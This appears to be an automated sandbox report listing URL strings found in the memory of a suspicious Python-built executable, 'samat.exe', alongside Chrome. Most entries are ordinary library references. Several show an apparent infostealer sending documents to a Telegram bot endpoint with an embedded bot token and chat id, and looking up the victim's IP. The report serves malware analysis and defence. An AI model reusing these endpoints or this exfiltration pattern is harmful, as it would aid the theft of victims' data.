Source: samat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wwwsearch.sf.net/):
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard7
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com/
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.myip.com/0
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYP
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjyp
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://blog.jaraco.com/skeleton
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://bugs.python.org/issue44497.
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526120054.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531854842.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561049803.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/astral-sh/ruff
Source: samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: samat.exe, samat.exe, 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmp, samat.exe, 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmp String found in binary or memory: https://github.com/mhammond/pywin32
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/platformdirs/platformdirs
Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/psf/requests/pull/6710
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/packaging
Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/packagingp
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/wheel
Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/wheel/issues
Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de1
Source: samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11z
Source: samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/issues
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/292002
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail
Source: samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://google.com/mail/
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/
Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508966927.000001BCCC48A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521773400.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549013066.000001BCCC8AA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4511944713.000001BCCC492000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538378339.000001BCCCAA1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/get
Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/post
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://importlib-metadata.readthedocs.io/
